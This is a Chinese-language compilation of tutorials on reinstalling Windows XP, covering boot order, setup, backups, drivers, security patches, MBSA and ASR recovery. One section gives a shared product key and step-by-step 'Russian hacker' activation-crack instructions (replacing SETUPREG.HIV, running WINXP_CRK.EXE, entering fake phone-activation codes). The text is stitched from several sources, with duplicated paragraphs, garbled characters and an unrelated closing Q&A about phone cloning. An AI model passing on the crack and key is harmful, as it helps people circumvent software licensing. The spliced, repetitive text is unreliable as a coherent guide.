（1）启动计算机，当屏幕上显示 Press Del to Enter BIOS Setup提示信息时，按下键盘上的Del键，进放主板BIOS设置界面。

（2）选择 Advanced BIOS Features 选项，按Enter键进入设置程序。选择First Boot Device 选项，然后按键盘上的Page Up或Page Down 键将该项设置为CD-ROM，这样就可以把系统改为光盘启动。

（3）退回到主菜单，保存BIOS设置。（保存方法是：按下F10，然后再按Y键即可）

（4）然后将光盘放入光驱，并重启电脑，系统便会从光盘进行引导，并显示安装向导界面，你可以根据提示一步步进行安装设置就OK了。

在Windows XP拷贝完文件到硬盘，第一次重新启动计算机前，必须把光盘从光驱中取出，否则系统仍会从光盘启动并会循环执行安装程序。

方法2:

然后，按任意键进入光驱启动模式，加载Mini版本的操作系统。

然后，按Enter确定继续安装。

然后，按F8接受许可证协议。

然后，选择你想要安装的位置，选择一个足够大的空间，按Enter。

然后，选择文件系统，推荐使用NTFS，按Enter。

然后，将进入磁盘扫描，并且将安装程序复制到硬盘上。

然后，计算机将在15秒后重新启动，按Enter立即重新启动。

然后，从硬盘启动继续安装过程，此时开始是图形界面模式。

在进行完一系列硬件检测后，将进入区域选择提示，在此配置语言，键盘和所在地区。

然后，系统将提示你输入用户名和组织名，并生成一个计算机名，你可以更改。

然后，将提示输入产品注册码。

然后，将提示你输入管理员密码。

然后，将显示组件选择框，选择你想要安装的Windows组件。

然后，将进入时区和时间的设置。

然后，进入联网组件安装（如果你的计算机有网卡并在硬件检测时被正确识别）。

在配置好网络之后，计算机将检测并安装一系列Windows组件及服务。

然后，重新启动，运行新安装的Windows。

然后，进入安装的最后阶段，监测前面没有检测到的即插即用硬件。

最后，可以用了！

方法3:

装系统（下面以安装WINDOWS XP为例）

我选的是没有任何破解的、完整的Windows XP安装光盘。启动电脑，当出现“光盘启动按任意键”字样时回车，开始复制安装程序，检验系统盘位置的容量和格式，这些都可以不理；出现对系统硬盘的文件格式的选择时最好�AT32，不要选NTFS。尽管NTFS文件体系对xx作系统的稳定性和速度以及硬盘管理功能有很大的提高，但NTFS只是支持以NT为内核的Windows NT、Windows2000、WindowsXP，不支持DOS、WindowsME、Windows98。所以，对于我们经常玩软件的人并不适合。一旦出现系统崩溃，在NTFS下有可能要通过重新分区、格式化等手段来重新安装系统，只要重新分区，硬盘上的资料和数据就彻底完蛋

了。（这是我吃了无数亏得来的教训，当年在使用Windows2000时，我就采用了NTFS系统,主要用以防止CIH病毒对系统和硬件的超级破坏，可现在防、杀CIH太容易了）相反，在FAT32文件系统下，只要有一张98或Me的启动盘格式化一下C盘就可以重装系统了，也不怕丢失所有硬盘上的数据和资料。（关于分区，这里就不说了，以后有机会专门说说分区，包括FDISK和DM的实战xx练，分区是一项比较危险和麻烦的事情） 接着，复制系统文件，准备安装等步骤。出现选择时区、语言等对话框，这就不用我说了吧。耐心等待。

如果是在DOS下原始安装XP,则必须先把smartdrv.exe文件（在Win98的安装目录下，名为smartdrv.exe）拷入98启动软盘，安装之前运行一下就可以大幅度提高安装速度。（我在安装之前有时候运行一下，有时候忘了，可我没有感觉到有多大的差别，也可能我的电脑内存比较大？说不清） 如果你是在原有系统不变、系统硬盘上有xx作系统的情况下重新安装XP,在安装的过程中会出现《升级/全新安装》对话框，此时你必须选择升级，除非你想在你的机子上安装双xx作系统。 要求输入序列号时输入以下号码： BX6HT-MDJKW-H2J4X-BX67W-TVVFG 这个注册码基本都能安装（我最少试了5、6种XP安装光盘了） 一般安装时间不超过60分钟。 安装完毕，选择现在不激活以后激活，按下一步，至少填入一个名字，如JixXP，一路回车键，可以了。 现在开始激活系统：我采用的是俄罗斯黑客的激活办法。见下面使用说明： 方法：把SETUPREG.HIV复制到%systemroot%system32目录下 覆盖原文件（我倒是找不到这个SETUPREG.HIV，直接粘贴上去的）， 重启， 按F8进入安全模式，以管理员身份登录， 运行WINXP_CRK.EXE，重启，进入WinXP，在要求激活时选择“电话激活”，在每个方 框中都填入“401111”－－－－激活成功！ 西部电子 提供下载 不用多说了吧。我只告诉你一个字：棒！！

首先要搞清楚的是，这里所说的“重装”是什么意思？其实，所谓“重装”，是指重新安装操作系统，从目前的实际情况出发，估计普通用户中很少会有朋友去选择Linux、OS/2、Unix等另类操作系统，因此我们这里所指的是重新安装Windows操作系统。

一般安装操作系统时，经常会涉及到全新安装、升级安装、Windows下安装、DOS下安装等安装方式，各种安装方式的含义如下：

● 全新安装：在原有的操作系统之外再安装一个操作系统，也就是我们通常所说的多操作系统并存。如果你还想使用以前的操作系统，或者说对新版本的Windows系统不那么放心，而只是想先试用一段时间，那么选择“全新安装”方式是最为理想的了。该方式的优点是安全性较高，原有的系统不会受到伤害，常见的有Windows 98/2000、Windows 98/XP。

● 升级安装：对原有操作系统进行升级，例如从Windows 98升级到Windows 2000或Windows XP，该方式的好处是原有程序、数据、设置都不会发生什么变化，硬件兼容性方面的问题也比较少，缺点当然是升级容易恢复难。

● Windows下安装：这是最简单的一种安装方式了，在Windows桌面环境中插入安装光盘运行安装程序，优点是界面熟悉、操作简单。

● DOS下安装：这是高手才用的安装方式，需要在漆黑一团的DOS提示符下进行，因此能够掌握此安装方式的一般都是高手。通常，我们只需要在BIOS中设置为光驱引导，然后用Windows安装光盘启动系统，安装程序就能自动运行；或者，你也可以在Windows环境下手工执行Setup.exe程序来进行。

小提示：如果你是在DOS下重装系统，请备份并事先加载smartdrv.exe(磁盘高速缓冲程序)，否则安装速度会慢得惊人。

由于我们考虑的是重装系统，因此自然就不涉及升级安装，一般来说有如下两种情形：

被动式重装

由于种种原因，例如用户误操作或病毒、木马程序的破坏，系统中的重要文件受损导致错误甚至崩溃无法启动，此时自然就不得不重装系统了。有些时候，系统虽然运行正常，但却不定期出现某个错误，与其费时费力去查找，不如重装了事。

主动式重装

一些喜欢摆弄电脑的DIY爱好者，即使系统运行正常，他们也会定期重装系统，目的是为了对臃肿不堪的系统进行减肥，同时可以让系统在最优状态下工作。

小建议：不管是主动重装还是被动重装，又可以分为覆盖式重装和全新重装两种，前者是在原操作系统的基础上进行重装，优点是可以保留原系统的设置，缺点是无法彻底解决系统中存在的问题，毕竟治标不治本嘛；后者则是对操作系统所在的分区进行重新格式化，有时为了彻底起见，可能还会进行重新分区，在这个基础上重装的操作系统，几乎就是全新安装的，这种重装方式比较彻底，不仅可以一劳永逸解决系统中原有的错误，而且可以彻底杀灭可能存在的病毒，强烈推荐采用此种重装方式。

系统重装前的准备工作

系统重装是一个比较大的工程，根据笔者的经验，分区、格式化、安装系统、安装驱动程序这些环节算下来，至少也需要2～3个小时，如果系统配置稍次一些，所需要的时间可能就更多了。在重装系统前，下面这些准备工作是必不可少的：

备份重要的数据

虽然升级系统不会有多大危险，但总要有备无患。建议朋友们在升级之前先将系统中的重要数据备份下来，特别是电子邮件的帐户配置/地址簿、QQ好友名单/聊天记录、MSN Messenger联系人列表、收藏夹列表、Cookies等，当然还有你的个人文档。

备份上述资料时，你可以手工备份，也可以使用第三方工具软件逐个备份，如果使用的是Windows XP系统，不妨使用系统内置的“文件和设置转移向导”。这是一个非常不错的备份工具，可以从“开始” “所有程序” “附件” “系统工具”中找到。

● 导出数据

Step1 如图1所示，由于我们是执行导出数据的操作，因此这里应该选择“旧计算机”，然后点击“下一步”按钮，稍等片刻后会看到一个提示选择转移方法的对话框，其中列出了直接电缆、家庭网络或小型办公网络、软盘驱动器、其他可移动媒体、其他等选项，建议选择“其他”项，这样可以将文件和设置保存到任意一个磁盘或文件夹中，例如软盘、优盘，用户的可选择性更自由、更丰富一些。

Step2 当看到图2对话框时，你可以根据自己的需要在这里自由选择转移项目，可以只转移设置或只转移文件，也可以同时转移文件和设置，这些设置包括IE设置、Microsoft Messenger、Microsoft Netmeeting、MSN Explorer、Outlook Express、Windows Media Player、区域设置、任务栏选项、显示属性、共享文档、桌面、我的文档等内容。当然你也可以重新自定义文件和设置列表，点击“下一步”按钮后就可以导出到指定路径了。

需要导入数据时，应该在图1窗口中选择“新计算机”项，当看到图3窗口时，请根据实际情况选择，由于我们前面选择了“其他”项，因此这里应该选择“我不需要向导磁盘，我已从旧计算机收集了文件和设置”项，然后选择“其他”项，接下来点击“下一步”按钮即可导入数据。这其中的过程完全是自动完成，唯一需要手工干涉的是导入结束后需要重新启动系统或注销系统才能生效。

备份驱动程序

重装系统后，驱动程序的安装也是一个大问题，虽然Windows XP可以识别的硬件种类不少，但一些新推出的硬件设备恐怕还是需要手工安装驱动程序的。假如你手头可以找到相应的驱动程序光盘/软盘，那倒不用多说，但假如驱动程序光盘/软盘已经丢失，那该怎么办呢？

● 上网下载：将事先上网下载的相应驱动程序保存在优盘或移动硬盘上，或者也可以刻录到光盘上。

● 手工导出：这里当然不是指查找*.inf文件中的内容后手工导出，我们可以利用驱动精灵2004、驱动精灵2005等软件备份驱动程序(见图4)，具体操作这里就不多说了。

必备工具

请准备好一张Windows 98的超级启动盘，注意这不是指在Windows 98的命令行方式下使用Format A:/s命令制作的启动盘，也不是从“资源管理器”中格式化的软盘，而是指在安装Windows 98时制作的启动盘，或者安装结束后在“控制面板”｜”添加删除程序”｜”启动盘”中制作的启动盘。这就是所谓的超级启动盘，这张软盘可以加载光驱、创建虚拟磁盘、调用外部命令等。

当然，如果你的电脑支持光驱启动，而你恰好又有正版的Windows安装光盘，那么就可以省去制作超级启动盘的步骤，只要将系统设置为光驱引导然后用安装光盘启动系统就可以了。

需要导入数据时，应该在图1窗口中选择“新计算机”项，当看到图3窗口时，请根据实际情况选择，由于我们前面选择了“其他”项，因此这里应该选择“我不需要向导磁盘，我已从旧计算机收集了文件和设置”项，然后选择“其他”项，接下来点击“下一步”按钮即可导入数据。这其中的过程完全是自动完成，唯一需要手工干涉的是导入结束后需要重新启动系统或注销系统才能生效

备份驱动程序

重装系统后，驱动程序的安装也是一个大问题，虽然Windows XP可以识别的硬件种类不少，但一些新推出的硬件设备恐怕还是需要手工安装驱动程序的。假如你手头可以找到相应的驱动程序光盘/软盘，那倒不用多说，但假如驱动程序光盘/软盘已经丢失，那该怎么办呢？

● 上网下载：将事先上网下载的相应驱动程序保存在优盘或移动硬盘上，或者也可以刻录到光盘上。

● 手工导出：这里当然不是指查找*.inf文件中的内容后手工导出，我们可以利用驱动精灵2004、驱动精灵2005等软件备份驱动程序(见图4)，具体操作这里就不多说了。

必备工具

请准备好一张Windows 98的超级启动盘，注意这不是指在Windows 98的命令行方式下使用Format A:/s命令制作的启动盘，也不是从“资源管理器”中格式化的软盘，而是指在安装Windows 98时制作的启动盘，或者安装结束后在“控制面板”｜”添加删除程序”｜”启动盘”中制作的启动盘。这就是所谓的超级启动盘，这张软盘可以加载光驱、创建虚拟磁盘、调用外部命令等。

当然，如果你的电脑支持光驱启动，而你恰好又有正版的Windows安装光盘，那么就可以省去制作超级启动盘的步骤，只要将系统设置为光驱引导然后用安装光盘启动系统就可以了。

快速重装系统

重装系统大体包括下面一些步骤：

Step1 调整系统引导顺序：进入BIOS设置程序，将系统引导顺序设置为光驱优先或软驱优先即可；

Step2 重新分区和格式化：为了保持系统的干净，强烈建议重装系统时对硬盘进行重新分区和重新格式化。如果你不想重新分区的话，格式化系统分区是必不可少的，运行FORMAT C:命令就可以了；

Step3 安装操作系统：用Windows安装光盘引导系统，然后按照安装向导的提示进行操作；

Step4 安装驱动程序：大多数情况下，需要我们手工安装的驱动程序并不会很多，一般有显卡、声卡、Modem、网卡等设备。如果前面已经用驱动精灵2005等软件备份了驱动程序，这里只需要恢复即可，或者插入驱动程序盘手工安装也行。

给新装系统打上安全补丁

虽然微软系统目前将安全性视为头等要务，但号称有史以来“最安全的操作系统”的Windows XP仍然不时曝出各种漏洞，尽管微软忙着发布相应的补丁程序和补丁包，但仍然防不胜防。例如2003年的冲击波和2004年的震荡波，给全世界的Windows用户造成了相当大的损失。

在系统重装刚刚完成，杀毒软件和防火墙软件还未安装的情况下，如何保证Windows操作系统的安全性呢？

断网安装补丁

冲击波和震荡波对Windows 2000/XP的威胁相当大。如果你使用的是永远在线的小区宽带，那么请在系统重装结束的第一次启动时断网(拔出网线)，然后手工安装SP1补丁包；如果你嫌太大的话，可以手工安装KB823980、KB835732等更新程序，这样可以解除冲击波、震荡波的威胁，这些更新程序当然在重装系统前就要下载好。

如果你使用的是Windwos XP操作系统，请不要忘记激活内置的防火墙功能，虽然这个内置的防火墙功能与专业的防火墙软件无法相比，但关上篱笆门阻止那些伪黑客的攻击是不成问题的。

安装更新程序

打开IE，从“工具”菜单下运行“Windows Update”命令，此时会自动链接到微软的更新站点，点击欢迎界面中的“扫描以寻求更新”按钮，更新程序将自动从Windows Update自动搜索本机可用的更新数据。接着我们会看到一个进度条，很快就会显示所有更新信息，如图5所示，这些可用更新分成三大类：关键更新和Service Pack、Windows XP、驱动程序更新。

点击“复查并安装更新”按钮后，可以浏览相应的更新并查看到更详细的说明信息，如图6所示，这些说明信息包括编号、名称、文件大小、下载所需要的时间、主要介绍等，注意“关键更新和Service Pack”更新缺省是全部选择的，如果你觉得某项更新不需要的话则可以点击“删除”按钮将之从更新列表中清除，如果无误的话就可以点击“立即安装”按钮开始安装这些更新。如果是安装“Windows XP”更新，那么你需要一项一项手工添加后才能安装。

从Windows Me开始，微软已经为用户提供了后台自动更新的功能，该功能可以在后台自动扫描可用的更新文件，当然前提是必须连接到Internet才行。右击“我的电脑”，切换到“系统属性/自动更新”选项页，如图7所示，在这里选择“自动下载推荐的更新，并安装它们”，设置好自动下载的时间，以后就省事多了。

利用MBSA发现系统漏洞

当然，如果仅仅依靠微软发布的安全公告来查漏补缺的话，那实在是太危险了。这里笔者建议大家可以安装Microsoft Baseline Security Analyzer（MBSA，微软基准安全分析器），它的下载地址是 ... /tools/mbsahome.asp，它可以检查你的系统是否已安装了最新的安全补丁，目前最新版本是1.1，建议大家安装使用。

MBSA的主界面如图8所示，如果是扫描本机的话请选择“Scan a computer”项，在扫描过程中会显示一个进度条，扫描完毕后，MBSA将显示如图9所示的对话框，这里清楚地列出各测试项目在本系统内的状态，请朋友们注意各项目前面的“Store”一栏中符号的区别及颜色：

● 红色或黄色的叉号：表示该项目未能通过测试；

● 雪花图标：表示该项目还可以进行优化，也可能是程序跳过了其中的某项测试；

● 感叹号：表示尚有更详细的信息；

● 绿色的对钩：这当然是最理想的，表示该项目已通过测试。

在那些未能通过测试的项目下面，一般都会提供“What was scanned”、“Result details”和“How to correct this”等选项，其中第一个将告诉我们分析器在该项目上主要进行了什么测试，而后两项告诉我们详细的结果，以及如何做才能够通过这项测试。你只需选择“How to correct this”选项，就可以按照系统提示去下载补丁程序以修补漏洞了。

自然，上面提到的方法只是治标不治本，如果要保证系统的稳定和安全，安装一款正版的杀毒软件和防火墙软件，绝对是必不可少的。

Windows XP的克隆功能

系统重装之所以被菜鸟们视为畏途，其操作之复杂倒在其次，关键是重装系统后，不仅需要重装所有更新程序或补丁包，而且还需要重装相应的应用程序，这样所花费的时间就非常可观了。

Windows XP提供了一个功能强大的克隆程序(Automatic System Recovery，简称ASR)，该工具对系统状态、系统服务以及与操作系统组件相关联的所有磁盘进行备份，同时它还创建一个包含备份信息、磁盘配置(包括基本卷和动态卷)以及恢复方式等内容的文件，其优点是可以完整的将Windows XP系统恢复为原来的面貌，包括系统中的各项配置和所安装的软件。

使用ASR的前提

要使用ASR功能，必须保证硬盘至少被划分为两个以上的分区，而且非系统分区上的可用空间必须超过系统分区，这是因为ASR恢复时会对系统分区进行格式化，然后准备好一张质量完好的空白软盘和Windows XP安装光盘。另外，ASR应该作为系统恢复过程中最后采取的手段，仅在安全模式启动或最后一次正常模式等恢复措施无效时方可使用。

备份系统

ASR之所以能够恢复系统，当然是事先进行了备份，这个备份工具可以在“附件” “系统工具”中找到。当弹出“欢迎使用备份或还原向导”对话框时，点击“高级模式”按钮切换到图10所示的“备份工具”对话框，选择“自动系统恢复向导”，此时会弹出图11所示的“自动系统故障恢复准备向导”对话框，然后按照提示进行操作。备份目的地当然是放在可用空间较大的非系统分区，建议备份文件名可以更改为当前的日期，这样恢复时就可以知道是何时备份的。

备份结束后，系统会提示插入一张格式化的软盘到软驱中，这张被称为ASR的紧急修复软盘将包含恢复系统所需要的信息，制作完成后请将其设置为写保护状态并妥善保管。

小提示：ASR只备份那些启动系统所需要的系统文件，默认设置下并不会备份数据，因此你不用担心会占用太多的磁盘空间，为了安全起见，建议将备份设置为计划任务定期备份，这样可以随时保持系统处于最新状态，一旦系统出现问题，可以以最小代价进行解决。

还原系统

如果Windows XP一旦出现什么问题，我们可以启用Windows XP安装光盘引导系统，当安装程序进入蓝底色的字符模式时，按下F2键，此时系统会提示插入ASR软盘，然后安装程序会自动启动ASR的恢复功能部分，并加载必要的文件和驱动。ASR将从先前创建的文件中读取磁盘配置信息，并在启动计算机所需的磁盘上恢复磁盘标记、卷及分区，也就是说会自动删除原先的系统分区并进行格式化，同时读取软盘中保存的磁盘配置信息，接着会利用Windows XP安装光盘重新安装一个最小化的操作系统，最后从备份文件中提取和恢复原来的系统文件和程序文件并导入原来的位置。

小提示：ASR不同于通常的覆盖式重装，因为后者只会对操作系统进行简单的覆盖，仅仅能够修复一些比较小的错误，并不能真正解决问题，而ASR既彻底重装系统(格式化），又可以自动提取和恢复原来的系统文件和程序文件，类似于Ghost的克隆功能，但稳定性要胜出一筹。

参考资料：

参考资料：

手机号码被黑客知道会不会被克隆

手机号是可以被克隆的，不一定只有黑客可以克隆，不过可以放心，一般人不会闲的克隆你的手机号的。